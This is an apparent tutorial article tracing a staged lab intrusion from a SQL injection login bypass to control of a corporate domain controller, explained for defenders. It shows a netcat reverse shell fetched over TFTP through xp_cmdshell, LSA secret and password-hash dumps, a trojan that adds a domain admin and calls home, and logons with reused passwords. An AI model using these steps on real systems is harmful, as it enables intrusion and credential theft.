Before I get started, there are several things you need to know about penetration testing. First of all, a penetration test gone wrong can have dire consequences for the stability of your network. Some of the tools used by hackers (criminal and otherwise) are designed to probe a network for vulnerabilities. Hacking tools and exploits used against a system can go wrong, destabilize a system or the entire network, or have other unintended consequences. A professional knows where to draw the line and how far she can push the network without breaking it. An amateur usually does not.

A healthy infusion of paranoia tends to be remarkably useful when protecting networks. One of the worst mistakes a security administrator can make is to assume everything is OK. Be aware of the mythical "your network is secure" statement. With alarming frequency, security consultants will leave you with a report that claims that your network is secure, based on the fact that they were unable to get into anything. This certainly does not mean your network is secure! It only means they couldn't find a way to break it, but someone else still could.

Target Network

Most networks today are built on what is called the eggshell principle: hard on the outside and soft on the inside. This means that if an attacker can gain a foothold onto the network, the rest of the network will usually fall like dominoes. Once inside, the most difficult part is often to figure out what to attack next and where to go for the really juicy bits of information. It does not have to be this way. With the proper techniques, we as network administrators can achieve two crucial objectives: to make it much more difficult to gain a foothold in the first place and to make it much more difficult to use that foothold to get anywhere else on the network.

Figure 1 Target Network

Before I start attacking the target network, let's take a look at what I'm up against. Obviously, a real attacker going after a real network would rarely have access to complete network diagrams, but in my case it is enlightening to look at the configuration of the target network (see Figure 1).

As Figure 1 shows, my target network is a standard dual-screened subnet with a firewall at the front and at the back. The perimeter network has a pretty common setup with a front-end Web server, a back-end database server, and a demilitarized zone (DMZ) domain controller (DC). There is a corporate DC on the back end, and the attacker's end goal is to take control of that DC.

Perhaps the only unusual aspect of this network is the fact that the Web server and the DMZ DC are both serving as routers. This is actually an artifact of how this scenario was constructed. The network in question was built as virtual machines running in Microsoft® Virtual PC 2004 so that I can carry the network with me and use it for demonstrations. Realistically, I can only run two virtual machines per host computer. To run the entire network I need half as many hosts as I need guests. Had I built this with separate routers I would have needed three laptops (or one more than I'd ever want to carry). To that end, the Web server and DMZ DC are both serving as routers to reduce the number of host machines needed. I assure you, this somewhat unorthodox configuration has no bearing on what is to come.

The first step in hacking any network is to figure out what to attack—to develop a footprint of the target network. Some of the things it is useful for a criminal hacker to learn include:

Network address ranges
Host names
Exposed hosts
Applications exposed on those hosts
Operating system and application version information
Patch state of both the host and of the applications
Structure of the applications and back-end severs

So let's take a look at what kinds of information an attacker can obtain and learn how the typical hacker can find that important information.

Network Address Ranges and Host Names

The next step in a good hack is to find the logical locations for the networks of interest. Say I'm performing a penetration test of contoso.com. I would start out by looking up what networks are registered to contoso.com. Perhaps even more interesting than the publicly registered address ranges for contoso.com is any information on networks connected to the target network, such as an extranet or a business partner. It's often easier to attack poorsecurity.com and take over that domain before jumping from there to contoso.com. Like links in a chain, a network is only as secure as the least secure network connected to it (including all the VPN users connecting into it).

The next thing the attacker needs is host names. In some cases, it is possible to perform nslookup requests on large swaths of the network and it may even be possible to perform something called a zone transfer. A zone transfer is simply a request to a DNS server to send back a copy of an entire DMZ zone (a listing of all the registered names in the network). While host names are not critically important to most attacks, they can make an attack much simpler. For example, if you have the hostname of a Web server running IIS, you can deduce the anonymous IIS account for that host, since it is usually called IUSR_hostname. Now let's assume that the administrator has configured account lockout on that system. All an attacker has to do to take down that Web server is to send a large number of requests to the server asking it to authenticate you as IUSR_hostname. In short order the attacker can send enough bad passwords to lock out the anonymous user account. Once that account is locked out, the attacker can just keep sending enough bad requests to keep it that way and this Web server will no longer serve anything to anyone.

Exposed Hosts and Exposed Applications

More interesting than host names are the hosts that are actually exposed. In this phase of the attack, I am trying to locate easy targets. Doing so may be absolutely trivial. You may not even need any hacking tools, as long as Internet Control Message Protocol (ICMP) traffic is not blocked at the border. In that case, the following command is perfectly sufficient:

Copy Code

c:\discoverHosts 192.168.2

192.168.2.30

Obviously, the IP address at the end would need to be adjusted to the appropriate target range. All I am doing here, however, is sending an ICMP echo to each host on a particular network. If ICMP traffic is not blocked, you just sit back while your network generates a list of valid addresses.

In the vast majority of cases, ICMP traffic should be sent to /dev/null at the border. Even a half decent firewall should block ICMP, but it is surprising how often administrators forget to ensure that it is actually disabled. No response should even be sent. While this does not really stop enumeration, it makes it marginally more difficult since the attacker needs to rely on custom tools, such as port scanners.

A port scanner is simply a tool that attempts to connect to a target and report whether it was successful or not. A successful connection means the host is listening. An unsuccessful connection usually means it is not. The most common type of port scan is known as a SYN scan, where the attacker attempts to establish an ordinary connection to the target. If a host is listening, the connection will be successful and the port scanner will notify the attacker that a port is open. You can port scan an entire network in short order. Doing so on a range of well-chosen ports can give you a tremendous amount of information about what is available on the network.

Port scanning is the way to determine what applications are exposed on a host. This allows us to get information on possible vectors for attack. Some of the applications commonly looked for include the FTP clients and servers, Telnet, mail servers, and HTTP Web servers.

Version Info and Patch State

If you can, it is very useful to get information on the version of the applications that we find running on a target machine. For example, many applications have some kind of banner that is sent as soon as someone connects. Most SMTP and POP servers as well as many Web servers are configured to do this. In our case, however, the target network is running IIS 6.0 on Windows Server™ 2003, and IIS 6.0 does not send a banner with any usable info.

It is also very interesting to an attacker to find out what patch state the exposed servers are in. This information can be found in a variety of ways. In some cases, the banners presented by the applications will tell you all you need to know. For example, sendmail banners usually tell you the version number of the daemon. If you know which version of sendmail still exposes certain vulnerabilities, you have all the information you need. In other cases, you can figure out whether it has a particular patch or not from the responses the system is giving you. This is essentially the technique used in good vulnerability scanners and in OS fingerprinting tools. As a last resort, you can always fire off an exploit against a system and see what happens. This is often how vulnerability scanners look for denial of service attacks. If the system still responds after the attack it was most likely not vulnerable!

Structure of the Apps and Back-End Servers

It is often very helpful to get information about the structure of the application and back-end server(s), if any. This is usually very difficult, but in some cases you luck out. For example, let's assume you have a target network that uses a particular third-party Web application with very distinct file names and page designs. In this case, it is often obvious to the attacker which application you are using. If the attacker is familiar with the application, she may know how to exploit it. For instance, the application may use a configuration file called %webroot%\system.config. If files with the .config extension are not parsed by the Web server, the attacker can simply request this file in a Web browser. In a best-case scenario, that file will only give her information such as the names of the back-end servers and databases. In the worst-case scenario, that file will contain the user name and password used to actually establish the connection between the Web server and a database server.

Do not dismiss this as a contrived example. I encountered this exact situation just a few months ago as I was looking at a customer's network to see whether there was anything at all that could be done to improve security. A very large number of commercial Web applications are extremely poorly written, essentially turning them into backdoors into the network.

At this point, I have just about all the information I need to start hacking. The first step is to establish an initial foothold into the network, to pierce the eggshell, if you will.

Initial Compromise

Let's assume I've done some initial probing and know that the target network is fully patched and that there is a really tight firewall in front, only allowing traffic on ports 80 and 443 (the defaults for HTTP and HTTPS); where do I go from here? Remember what I said about backdoors. Where could the backdoor be? What am I up against? The first step is to look at what is exposed to me: a Web application. Figure 2 shows the Web server homepage. From this screen, I can tell that this is obviously an ordering site of some kind. Let's use a legitimate account to find out more about it.

Figure 2 Contoso.com Homepage

The next page shows the Pubs bookstore and lists books for sale. They display my username on the page. This could come in handy if they are not careful, because I can use it to validate certain other techniques. For example, I have a hunch that this site uses a pretty poor algorithm for checking whether users have entered the right username or password (pretty shrewd, considering I wrote the algorithm!). I am also curious whether they are properly validating the input from the username fields. To find out for sure, I'm going to use a technique called SQL injection. Using a SQL injection attack, I pass the following string

Copy Code

foo' OR 1=1;--

in the username field. This yields the result shown in Figure 3.

In Figure 3, you can see that not only do I get logged on, but the application also displayed the fake username I sent it on the homepage. This latter artifact is actually a separate type of vulnerability known as a cross-site scripting (CSS) vulnerability, where the user input is echoed directly to the screen without sanitizing it first.

Figure 3 SQL Injection (and Cross-Site Scripting) at Work

So how was I logged on? There obviously isn't a user called foo' OR 1=1;--. The application is very poorly written. It assumes that if any results come back from the database when it asks for a user with a particular password, then the username and password combination is obviously valid, and therefore it should log on this user. The SQL injection attack effectively rewrote the database query to include the statement OR 1=1. Since 1 is always equal to 1, this evaluates to true, which means the entire query evaluates to true for all records in the database. This will return every user account in the database, which means the application thought I was logged on.

I can now send arbitrary commands to the back-end database server. I am going to use that capability in an elevation of privilege attack to get the database server to run commands for me.

Elevating Privileges

As you saw earlier, the database server is not directly accessible from the Internet, and the front-end Web server is fully patched and not vulnerable to any known attacks. The objective at this point is to elevate my privileges so that I become an internal user, preferably a highly privileged one, on one of the systems in the target network. To do that, I'll use SQL injection to send commands to the database server and ask it to do things for us. Note that I cannot connect directly to the database server, so instead I will ask it to make a connection to me. I'll begin by setting up a listener on the external network, and then I will make the database server connect to me.

Before I can command the database server, I need to get some tools onto the Web server to further the attack. This is important because, generally speaking, hacking tools are not installed on the operating system by default. To get them up there you can use Trivial File Transfer Protocol (TFTP), a connectionless protocol used primarily for booting diskless workstations. The client application for TFTP is installed on all Windows systems by default (with the exception of Windows Server 2003 Service Pack 1 and later), so unless you have removed it, it is still there and available. Since I have a SQL injection vulnerability, I can use it to command the database server to use TFTP to download netcat to the database server. Netcat is a network tool somewhat like telnet, except that it is unauthenticated and much more versatile. It is freely available on the Internet and even comes standard on many UNIX and Linux distributions. It is pretty much universally used by attackers, however, and should never be left on a system where it is not absolutely needed.

The attack works by calling the xp_cmdshell stored procedure. Installed by default on SQL Server™, xp_cmdshell is used to execute commands on the underlying operating system. I will simply use this procedure to run TFTP and upload my tools to the database. xp_cmdshell is rarely needed in most deployments and can be disabled in several ways to protect against exactly this kind of attack. Once I've uploaded netcat, I tell netcat to create a socket, and then I pass that socket as stdin, stdout, and stderr in a call to cmd.exe. This sounds complicated, but it works reliably. The result is an outbound connection where I pipe a command shell over a socket. I now have my remote command line:

Copy Code

c:\>nc -l -p 12345

Microsoft Windows 2000 [Version 5.00.2195]

(C) Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>hostname

hostname

PYN-SQL

[Editor's Update - 12/6/2004:The xp_cmdshell extended procedure is a powerful facility that, by default, is only available to system administrators. The SQL Server team recommends not allowing other users to execute this function. Additionally, since some system administrators don't require xp_cmdshell, SQL Server 2005 provides an additional layer of security by making xp_cmdshell optional so that it can't be used on those systems where it's not needed. Note that in the scenario described in this article, the web application connects to the database as sa, and as such the attacker is a system administrator.]

At this point, I have established my first foothold and am well on the way to taking over the network. I have escalated privileges from a remote anonymous user to an inside user. To find out what kind of user, I need to first get the rest of my tools onto the system. Those tools will be used to escalate local privileges if needed as well as to hack the rest of the systems on the network. I can transfer those, too, using tftp.exe. Once I've done that, I can verify my credentials on the host:

Copy Code

C:\warez>whoami

whoami

NT AUTHORITY\SYSTEM

Bingo! I'm already LocalSystem. That must certainly mean that SQL Server ran xp_cmdshell as LocalSystem, and that I have completely compromised the back-end database server. I can now proceed to hacking other machines on the network.

Hacking Other Machines

I have now pierced the eggshell. At this point, the objective is to fully "own" the network and take over everything else. Before I really get going, let's get some more information on my target using the dumpinfo utility, shown in Figure 4. dumpinfo is a custom tool that enumerates information from a system over a null session. A null session is an anonymous connection—one made without any authentication.

Figure 4 Localhost Dumpinfo

Copy Code

C:\warez>dumpinfo 127.0.0.1

The Administrator is:   PYN-SQL\Administrator

Users on PYN-SQL:

RID 1000        PYN-SQL\TsInternetUser  a User

RID 1001        PYN-SQL\SQLDebugger     a User

Share           Type            Comment

IPC$            Unknown         Remote IPC

ADMIN$          Special         Remote Admin

C$              Special         Default share

Administrators:

PYN-SQL\Administrator

PYN-DMZ\_ids

PYN-DMZ\Domain Admins

From this I can learn that there is not much on this system; it looks rather like a default system. Before I proceed with using this information, let's figure out the lay of the land. Shown in Figure 5, invoking ipconfig.exe tells me my IP address and configuration. Notice that the machine has a private address so my connection must be going through a NAT router at 172.17.0.1. This information will also be useful later. Now, let's get hacking again.

Figure 5 Ipconfig Output for PYN-SQL

Copy Code

C:\warez>ipconfig /all

Windows 2000 IP Configuration

        Host Name . . . . . . . . . . . . : PYN-SQL

        Primary DNS Suffix  . . . . . . . : PYN-DMZ.LOCAL

        Node Type . . . . . . . . . . . . : Mixed

        IP Routing Enabled. . . . . . . . : No

        WINS Proxy Enabled. . . . . . . . : No

        DNS Suffix Search List. . . . . . : PYN-DMZ.LOCAL

Ethernet adapter Local Area Connection:

        Connection-specific DNS Suffix  . :

        Description . . . . . . . . . . . : Intel 21140 Based PCI Fast Ethernet Adapter

        Physical Address. . . . . . . . . : 00-03-FF-03-3E-F0

        DHCP Enabled. . . . . . . . . . . : No

        IP Address. . . . . . . . . . . . : 172.17.0.3

        Subnet Mask . . . . . . . . . . . : 255.255.255.0

        Default Gateway . . . . . . . . . : 172.17.0.1

        DNS Servers . . . . . . . . . . . : 172.17.0.2

The first thing the attacker does now is look for the easy exploits. Perhaps the simplest is to use shared service accounts, if present. Shared service accounts are an easy vector because the easiest way to configure services on multiple systems is to use domain accounts to run those services under, and then configure services on many systems to run with the same accounts. Alternatively, in some environments, local accounts are used, but the credentials match those on other systems. This means that if we find any services running in regular user accounts (as opposed to system accounts such as LocalSystem, NetworkService, and LocalService) it's likely that they are used on multiple systems.

To find out whether this is a viable vector, let's check who is running services on the database server I am on. To do that, I use a tool designed for that purpose:

Copy Code

C:\warez>serviceuser \\PYN-SQL

IDS

PYN_DMZ\_ids

As you can see, there is a domain account used for the IDS service (presumably the Intrusion Detection Service). To find out whether it is truly useful, let's learn more about the account using the net command. You can see the output in Figure 6.

Figure 6 Listing Local Admins

Copy Code

C:\warez>net localgroup administrators

Alias name  administrators

Comment     Administrators have complete and

            unrestricted access to the

            computer/domain.

Members

----------------------------------------------

Administrator

PYN-DMZ\Domain Admins

PYN-SQL\Administrator

PYN-DMZ\_ids

The command completed successfully.

The _ids account is a domain account; and it is a local administrator.

It would of course be preferable if this was a domain account, but I'll take what I can get. To understand what you can do with this account, you need to know a little more about how Windows® operates. Services are applications that run when the system boots. Just like any other process on the system, services must run under some kind of user identity. When the service starts, the operating system will authenticate the account used for the service. To do this, it needs a username and password, which is stored in the Local Security Authority (LSA) Secrets. The LSA Secrets are maintained by the LSA to hold certain sensitive information, such as the computer account credentials, encryption keys, and service account credentials.

The LSA Secrets are encrypted on disk and decrypted by the OS when the machine boots. They are then held in clear text in the LSA process memory space while the system is running. To get at this information, the hacker must hook a debugger to the LSA process. That may sound daunting, but there are utilities designed specifically for this purpose. Note that the LSA is running as LocalSystem, so not just anyone can attach a debugger to a process running as LocalSystem. Doing so would be a serious security breach and violate all kinds of security models. However, any user who has the SeDebugPrivilege can do so. By default, this means only the Administrators are able. Since Administrators can do whatever they want anyway, this is not a security problem. They own the system without that privilege, and can grant themselves the privilege if they want. The problem comes when untrusted users have that privilege. In my case, I don't have to worry about that because my remote shell is running as LocalSystem. In other words, I am running as the same identity as the LSA process, and therefore have the right to attach a debugger to it, whether I have the privilege or not.

The output of running Lsadump, shown in Figure 7, has been truncated to make it easier to read, but the really interesting piece is right at the end, where the service account credentials are listed. As you can see, the right-hand column holds the service account password. I now know that there is a user called _ids, and that it has a password of "idsPasswd!" (the output is in Unicode, hence the dots in between, signifying nulls). The only thing left now is to find out where to use this account. By pinging all the hosts on the subnet, I find that there are only two other machines on this subnet, 172.17.0.1 (the gateway) and 172.17.0.2 (the DNS server). I suppose I should figure out a little bit more about each of them. To do that, I use dumpinfo again. By default, some Windows systems give out more information than others over a null session. Figure 8 shows some typical information.

Figure 8 Gateway Dumpinfo

Copy Code

C:\warez>dumpinfo 172.17.0.1

Unable to look up the local administrator

Unable to enumerate users because I could not get the Admin Sid

Share           Type            Comment

IPC$            Unknown         Remote IPC

ADMIN$          Special         Remote Admin

wwwroot$        Disk

C$              Special         Default share

Administrators:

Unable to enumerate administrators

ERROR: Access Denied

Figure 7 Lsadump Output

Copy Code

C:\warez>lsadump2

$MACHINE.ACC

 13 FE 4C 3A 04 F8 1F 94 75 C8 9B 0B 1C 35 45 7A  ..L:....u....5Ez

 52 7E 25 DF F8 17 F2 96 3A 35 81 C7              R~%.....:5..

DefaultPassword

DPAPI_SYSTEM

 01 00 00 00 C8 AA F8 8C 36 C7 69 CC DD 42 CB 15  ........6.i..B..

 3F 4E 07 6D 48 05 0A 4C FE 31 87 C9 F2 58 A3 AD  ?N.mH..L.1...X..

 B7 AD 13 20 26 11 24 24 FF 79 AE D3              ... &.$$.y..

...

_SC_IDS

 69 00 64 00 73 00 50 00 61 00 73 00 73 00 77 00  i.d.s.P.a.s.s.w.

 64 00 21 00                                      d.!.

I'm not getting very much info on this system because it is a Windows Server 2003 member server. Note that on Windows Server 2003 standalone and member servers, null session users will only be able to list the shares on the system, not the user accounts by default. You can tell from the dumpinfo output, however, that the default gateway is running a Web server, based on the fact that it exposes a wwwroot$ share. Notice that I do get a list of all the so-called hidden shares (shares postfixed with a $). The dollar sign is just a notification to the client-side of the API not to display this item. The dumpinfo tool ignores that notification and displays the item anyway.

It would also be helpful to find out what services are available on this system. This information will tell you the type of connections that you can make to it. To do that, let's turn to the portscanner:

Copy Code

C:\warez>portscan 172.17.0.1

Port 172.17.0.1:80 open

Port 172.17.0.1:135 open

Port 172.17.0.1:139 open

Port 172.17.0.1:445 open

Port 172.17.0.1:3389 open

This really doesn't tell me much, but it does verify that I am allowed to make SMB (ports 139 and 445) and Terminal Services connections (port 3389) to the gateway/Web server. This will be highly useful for furthering the attack in just a moment.

For now, let's take a closer look at the other system on the network, whose dumpinfo results are shown in Figure 9. The machine must be a domain controller because the account domains are PYN-DMZ but the hostname is PYN-DMZ-DC. By default, Windows Server 2003 DCs are configured for down-level compatibility. They let anonymous users access all information except for the list of users who are administrators. For completeness, we can also do a port scan:

Copy Code

C:\warez>portscan 172.17.0.2

Port 172.17.0.2:53 open

Port 172.17.0.2:135 open

Port 172.17.0.2:139 open

Port 172.17.0.2:389 open

Port 172.17.0.2:445 open

Port 172.17.0.2:3268 open

Figure 9 DNS Server Dumpinfo

Copy Code

C:\warez>dumpinfo 172.17.0.2

The Administrator is:   PYN-DMZ\Administrator

Users on PYN-DMZ-DC:

RID 1000   PYN-DMZ\HelpServicesGroup  an Alias

RID 1001   PYN-DMZ\SUPPORT_388945a0   a User

RID 1002   PYN-DMZ\TelnetClients      an Alias

RID 1003   PYN-DMZ\PYN-DMZ-DC$        a User

RID 1104   PYN-DMZ\DnsAdmins          an Alias

RID 1105   PYN-DMZ\DnsUpdateProxy     a Group

RID 1106   PYN-DMZ\FAjenstat          a User

RID 1107   PYN-DMZ\AAlberts           a User

RID 1108   PYN-DMZ\HAcevedo           a User

RID 1109   PYN-DMZ\MAlexander         a User

RID 1110   PYN-DMZ\KAkers             a User

RID 1111   PYN-DMZ\TAdams             a User

RID 1112   PYN-DMZ\KAbercrombie       a User

RID 1113   PYN-DMZ\Sculp              a User

RID 1114   PYN-DMZ\SAbbas             a User

RID 1115   PYN-DMZ\MAllen             a User

RID 1116   PYN-DMZ\JAdams             a User

RID 1117   PYN-DMZ\SAlexander         a User

RID 1118   PYN-DMZ\HAbolrous          a User

RID 1119   PYN-DMZ\PAckerman          a User

RID 1120   PYN-DMZ\GAlderson          a User

RID 1121   PYN-DMZ\PYN-SQL$           a User

RID 1122   PYN-DMZ\PYN-WEB$           a User

RID 1123   PYN-DMZ\_IDS               a User

Share      Type            Comment

IPC$       Unknown         Remote IPC

NETLOGON   Disk            Logon server share

ADMIN$     Special         Remote Admin

SYSVOL     Disk            Logon server share

C$         Special         Default share

Administrators:

Unable to enumerate administrators

ERROR: Access Denied

Since port 3268 is listening, this must be a Global Catalog server for the forest. This means that 172.17.0.2 is a highly valuable target. Interestingly, this system does not have Terminal Services enabled.

I still do not know where the _ids account is used, so I'll just have to try it. There is no point in trying it on the DC since I know there is no account there with that name, so I try it on the Web server. Before I can do that, I need the hostname on the Web server. For this I use a custom tool, GetSystemInfo:

Copy Code

C:\warez>GetSystemInfo 172.17.0.1

Server info on 172.17.0.1

Name:        PYN-WEB

Domain:      PYN-DMZ

Version:     5.2

Platform ID: 500

Comment:

Server Flags:

Workstation

Server

Dial-in Server

GetSystemInfo is a very simple tool that merely connects to the system and asks for information in the HKLM\Software\Microsoft\Windows NT\CurrentVersion key. From this you see that the system is called PYN-WEB. I still don't know exactly how to hack this box, but I'll try one more thing:

Copy Code

C:\warez>serviceuser \\PYN-WEB

IDS                             PYN-DMZ\_ids

I almost have the info I need because the Web server is also running the IDS service under the same account. That's all I need to try the _ids account:

Copy Code

C:\warez>net use \\172.17.0.1\c$ /u:pyn-dmz\_ids idsPasswd!

The command completed successfully.

As you can see, I have successfully taken over the Web server! Now my objective changes to taking over the domain itself and in turn getting to the corporate domain from there.

Owning the Domain

So far I own the database server and the Web server (everything except the domain controller in fact). But what have I really gained with the Web server? To find out, I need to start by uploading my tools to it and getting a remote command shell on that system just like I did on the database server. It is just a bit simpler now that I have an administrative SMB connection to the Web server. SMB allows easy access to the Web server. For example, I can now schedule a command or launch some form of portable remote command shell.

Once I have a local shell, I can use all the normal tools that I know and love. For example, I can easily find out who all the local administrators are. There are not many accounts here, as you can see in Figure 10. I only see the service account I've already found, the local administrator, and the domain admins. That probably means that when they need to administer the system, they use a domain administrator account. This means it might be possible to use a Trojan horse program to make one of those users take over the domain for us. Generally speaking, an attacker would rather use a direct attack, since they produce faster results. If all else fails, however, I will resort to a passive attack to accomplish my goal. You may have noticed by now that I have not seen so much as a dialog box. Can't I do some GUI hacking for a change? Sure. There are some tricks to it, though.

Figure 10 Find Local Admin

Copy Code

C:\warez>net localgroup administrators

Alias name administrators

Comment Administrators have complete and

unrestricted access to the computer/domain

Members

----------------------------------------------

Administrator

PYN_DMZ\_ids

PYN-DMZ\Domain Admins

The command completed successfully.

Recall that there were only two ports open on the firewall, 80 and 443. Since nothing was listening on port 443 on the Web server, I can establish a listener on that port without disrupting operations and risk tipping off the legitimate administrators. Rebinding terminal services to use that port would be highly noticeable.

Windows Terminal Services (using Remote Desktop Protocol) listens on port 3389. A portscan of the database server reveals that 3389 is indeed open:

Copy Code

C:\warez>portscan 172.17.0.3

Port 172.17.0.3:135 open

Port 172.17.0.3:139 open

Port 172.17.0.3:445 open

Port 172.17.0.3:1433 open

Port 172.17.0.3:3389 open

I can't establish a direct connection to the database server; for one thing, it's on a NAT'd network and is not directly accessible from the Internet. I can get there by putting a port redirector on the Web server. A port redirector takes traffic coming in on one port and directs it to another host on another port. In other words, I'll set up a port redirector on the Web server which will take incoming traffic on port 443 and send it to the SQL server on port 3389:

Copy Code

C:\warez>socketpipe 443 88 3389 172.17.0.3

With that socket open, all I do is establish a Web server connection using Terminal Services Client:

Copy Code

mstsc /v:192.168.2.30:443

Now that I can log on with my _ids user account, I have the full power of a graphical user interface (which some would argue is somewhat less than the full power of a command line, but no matter).

Even with the GUI, I have not yet taken over the DC. I'm going to use a Trojan horse to take it over. To do so, I use a really evil custom tool. First, I'll register it on the Web server (172.17.0.1) over my terminal services connection:

Copy Code

c:\warez>EvilTrojan -r 172.17.0.1 -a 192.168.2.112

The tool registers itself in the HKLM\Software\Microsoft\Windows\CurrentVersion\Run key, and therefore runs every time a user logs on. If that user is a domain admin, it creates a new user account on the domain and then adds that account to the domain admins group. If it's able to do so, it opens up the Messenger service and sends an administrative alert to the attacker (192.168.2.112 in our case). Lastly, it removes itself from the Run key to hide its tracks. All this happens while the administrator is logging on, and therefore is completely transparent to the administrator. In the end, the only thing left on the system to indicate that anything happened is a file called avcheck.exe that is located in the Windows directory.

Obviously, some other backchannel notification can be used. In the real world, attackers often use Internet Relay Chat (IRC). Even a really subtle HTTP transaction can serve as notification. Now all I have to do is to wait for a domain administrator to log on. Once an administrator logs on, I get a handy success notification:

Copy Code

C:\>nc -l -p 80

Succeeded in adding a user.

User: attacker$

Password: "Uare0wn3d!"

Domain: PYN-DMZ

DC: PYN-DMZ-DC

The notification can be received any way I want. This particular Trojan simply opens a socket to port 80 on the attacker's host and sends the notification to it. Notifications could be encrypted, encoded, come over just about any port or protocol, and altered in a myriad of ways. For instance, notifications to an IRC chat channel are quite common.

At this point, the DMZ domain has fallen and I have taken over the domain controller. Remember, this is the keeper of the keys to the kingdom and contains the user accounts database, among other things. In order to make use of this newfound power, I once again make the DC connect to me so I can get a remote shell. Once I do, I continue learning more about where I am, as is shown in Figure 11.

Figure 11 Ipconfig Output for PYN-DMZ-DC

Copy Code

C:\warez>ipconfig /all

Windows IP Configuration

   Host Name . . . . . . . . . . . . : PYN-DMZ-DC

   Primary Dns Suffix  . . . . . . . : PYN-DMZ.LOCAL

   Node Type . . . . . . . . . . . . : Unknown

   IP Routing Enabled. . . . . . . . : Yes

   WINS Proxy Enabled. . . . . . . . : No

   DNS Suffix Search List. . . . . . : PYN-DMZ.LOCAL

Ethernet adapter CorpNet:

   Connection-specific DNS Suffix  . :

   Description . . . . . . . . . . . : Intel 21140-Based PCI Fast Ethernet Adapter (Generic) #2

   Physical Address. . . . . . . . . : 00-03-FF-06-3E-F0

   DHCP Enabled. . . . . . . . . . . : No

   IP Address. . . . . . . . . . . . : 10.1.2.16

   Subnet Mask . . . . . . . . . . . : 255.255.255.0

   Default Gateway . . . . . . . . . :

   DNS Servers . . . . . . . . . . . : 172.17.0.2

Ethernet adapter DMZNet:

   Connection-specific DNS Suffix  . :

   Description . . . . . . . . . . . : Intel 21140-Based PCI Fast Ethernet Adapter (Generic)

   Physical Address. . . . . . . . . : 00-03-FF-07-3E-F0

   DHCP Enabled. . . . . . . . . . . : No

   IP Address. . . . . . . . . . . . : 172.17.0.2

   Subnet Mask . . . . . . . . . . . : 255.255.255.0

   Default Gateway . . . . . . . . . : 172.17.0.1

   DNS Servers . . . . . . . . . . . : 172.17.0.2

This system is not only dual-homed, but it is dual-homed on the corporate network and the DMZ, which means it must be acting as the router between the two. Before I take advantage of that fact, I can dump out all the user accounts on the domain controller. Recall that earlier I learned that there were about 15 user accounts on the DC? Well, cycles are wasting, so I'd better dump out the password hashes and get to work cracking them. Since I have administrative privileges, doing so is a simple matter of running the very popular PWDump tool (see Figure 12).

Figure 12 Pwdump2 Output

Copy Code

C:\warez>pwdump2.exe

Administrator:500:624aac413795cdc1ff17365faf1ffe89:b9e0cfceaf6d077970306a2fd88a7c0a:::

Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

krbtgt:502:aad3b435b51404eeaad3b435b51404ee:28237c666e4bb3cc96d670cadca1593b:::

SUPPORT_388945a0:1001:aad3b435b51404eeaad3b435b51404ee:cd072175763b0d5b3fbb152f57b96e7c:::

FAjenstat:1106:daf058ae79085db217306d272a9441bb:c43325fdf77cafacf02f6e3eaa7f5020:::

AAlberts:1107:1df8f06dcf78bb3aaad3b435b51404ee:2408f92ab284046ddcc6952755f449e2:::

HAcevedo:1108:dbff4b96d021df2f93e28745b8bf4ba6:bbd9477810308a0b676f3cda91f10539:::

MAlexander:1109:d278e69987353c4c837daf3f2ddd5ca3:2c67b571425751747e7ae379fefe9fcc:::

KAkers:1110:693de7f320aae76293e28745b8bf4ba6:fb853a32ccd2b92b43639b0e7d29e09d:::

TAdams:1111:ea03148efb24d7fc5be30f58d2a941d5:18cce97ee181d42be654133658723813:::

KAbercrombie:1112:6c32f38de08f49f026f8092a33daaf05:a88b78471261477e26d9e4c11571b127:::

Sculp:1113:49901659efc5e1d6aad3b435b51404ee:d986300c7c0c33d3cc5417dbac6f90db:::

SAbbas:1114:d6855d70abc371c2b77b4e7109416ab8:363c93e6be7a5cb001e7ad542c292f26:::

•••

By default, Windows stores two different password representations: the LM "hash" (which is not a hash at all) and the Windows NT® hash. From this output, I can tell that this system stores the LM hashes. This is good news for a criminal hacker since LM hashes are so much easier to crack. Feeding this output into my favorite password cracker, I can crack most of the passwords on this system within 24 hours. In fact, in less than a minute, I've cracked three of them using a hybrid attack. A real attacker may crack passwords even faster. Tools are available that trade off storage space for cracking speed, greatly decreasing crack time.

Now that I have the passwords, I need to find out more about where to use them. First, I know which systems are available on the 172.17.0/24 network, so let's see what I can find on the 10.1.2/24 net:

Copy Code

C:\warez>discoverHosts 10.1.2

Reply from 10.1.2.16: bytes=32 time<1ms TTL=128

Reply from 10.1.2.17: bytes=32 time=54ms TTL=128

16 is the datacenter DC as we've already learned, but 17 is a new host that we have not seen before. Let's see if I can get some more information on it:

Copy Code

C:\warez>GetSystemInfo 10.1.2.17

Server info on 10.1.2.17

Name:   PYN-CORPDC

Domain: PYN

Version:        5.2

Platform ID:    500

Comment:

Server Flags:

Workstation

Server

Domain Controller

Time source

17 is the domain controller I was looking for originally. I can tell that it is running Windows Server 2003, but not much else about it. Perhaps dumping out the users will give me additional information, like that shown in Figure 13.

Figure 13 Corp DC Dumpinfo

Copy Code

C:\warez>dumpinfo 10.1.2.17

The Administrator is:   PYN\Administrator

Users on PYN-CORPDC:

RID 1000   PYN\HelpServicesGroup   an Alias

RID 1001   PYN\SUPPORT_388945a0    a User

RID 1002   PYN\TelnetClients       an Alias

RID 1003   PYN\PYN-CORPDC$         a User

RID 1104   PYN\FAjenstat           a User

RID 1105   PYN\AAlberts            a User

RID 1106   PYN\HAcevedo            a User

RID 1107   PYN\MAlexander          a User

RID 1108   PYN\KAkers              a User

RID 1109   PYN\TAdams              a User

RID 1110   PYN\KAbercrombie        a User

RID 1111   PYN\Sculp               a User

RID 1112   PYN\SAbbas              a User

RID 1113   PYN\MAllen              a User

RID 1114   PYN\JAdams              a User

RID 1115   PYN\SAlexander          a User

RID 1116   PYN\HAbolrous           a User

RID 1117   PYN\PAckerman           a User

RID 1118   PYN\GAlderson           a User

•••

Share      Type            Comment

IPC$       Unknown         Remote IPC

NETLOGON   Disk            Logon server share

ADMIN$     Special         Remote Admin

SYSVOL     Disk            Logon server share

C$         Special         Default share

Administrators:

Unable to enumerate administrators

ERROR: Access Denied

As you can see, this system has a lot of users. Listed are several old friends who also had accounts on the DMZ DC. In fact, there are several whose passwords I have already cracked on the DMZ. At this juncture, I could either try to gather more information, or I could just be bold and try those accounts. Three guesses which of those options a hacker would use:

Copy Code

C:\warez>net use \\pyn-corpdc\c$ /u:pyn\GAlderson "yosemiTe^"

The command completed successfully.

